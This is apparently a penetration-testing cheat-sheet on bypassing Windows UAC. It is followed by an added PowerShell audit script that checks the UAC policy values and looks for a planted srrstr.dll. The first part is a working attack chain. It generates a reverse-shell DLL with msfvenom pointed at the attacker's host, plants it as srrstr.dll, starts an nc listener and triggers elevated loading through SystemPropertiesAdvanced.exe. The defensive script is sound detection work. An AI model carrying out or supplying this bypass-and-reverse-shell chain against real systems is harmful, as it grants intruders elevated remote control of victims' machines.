User Account Control (UAC) Bypass
UAC bypasses leverage flaws or unintended functionality in different Windows builds.
The following repository contains many different UAC Bypassing Techniques:
Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
Check the UAC level (0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
To check the Windows Build: [environment]::OSVersion.Version
Check the repository and see if anything exists for the target build number.
We can basically bypass UAC by placing a malicious srrstr.dll DLL in the WindowsApps folder, where it will be loaded in an elevated context.
Generate malicious DLL file:
msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll
Transfer the DLL to the target machine
Start a netcat listener on the attacker machine: nc -lvnp 4444
Get a reverse shell: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
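A defender-side check for the technique above, as an added example that is not part of the original page: it reads the same two UAC policy values and looks for a srrstr.dll in any PATH directory outside %SystemRoot%. It assumes the DLL is resolved through the standard DLL search order, so PATH directories are candidate locations; the function names Get-UacPolicy and Find-PlantedDll are hypothetical.

```powershell
# Added example (not from the original page). Read-only audit for the
# srrstr.dll hijack described above; run it on the host being checked.
$policyKey = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPolicy {
    # The same values the page reads with REG QUERY, plus the OS build.
    $p = Get-ItemProperty -Path $policyKey
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        Build                      = [Environment]::OSVersion.Version.ToString()
    }
}

function Find-PlantedDll {
    param([string]$Name = 'srrstr.dll')
    # Assumption: the DLL is found through the standard search order, so any
    # PATH directory outside %SystemRoot% is a candidate location.
    # Limitation: only the machine PATH and the current user's PATH are read.
    $machine = [Environment]::GetEnvironmentVariable('Path', 'Machine')
    $user    = [Environment]::GetEnvironmentVariable('Path', 'User')
    $dirs = ("$machine;$user" -split ';') |
        Where-Object { $_ } |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_).Trim('"').TrimEnd('\') } |
        Sort-Object -Unique |
        Where-Object { $_ -notlike "$env:SystemRoot*" }

    foreach ($dir in $dirs) {
        $candidate = [IO.Path]::Combine($dir, $Name)
        if (Test-Path -LiteralPath $candidate -PathType Leaf) {
            $file = Get-Item -LiteralPath $candidate -Force
            [pscustomobject]@{
                Path      = $candidate
                Created   = $file.CreationTimeUtc
                Owner     = (Get-Acl -LiteralPath $candidate).Owner
                Signature = (Get-AuthenticodeSignature -LiteralPath $candidate).Status
                SHA256    = (Get-FileHash -LiteralPath $candidate -Algorithm SHA256).Hash
            }
        }
    }
}

Get-UacPolicy | Format-List
$hits = @(Find-PlantedDll)
if ($hits.Count) { $hits | Format-List }
else { "No srrstr.dll found on PATH outside $env:SystemRoot." }
```

Any hit deserves triage: an unsigned srrstr.dll in a user-writable PATH directory, owned by a standard user, matches the placement step described above.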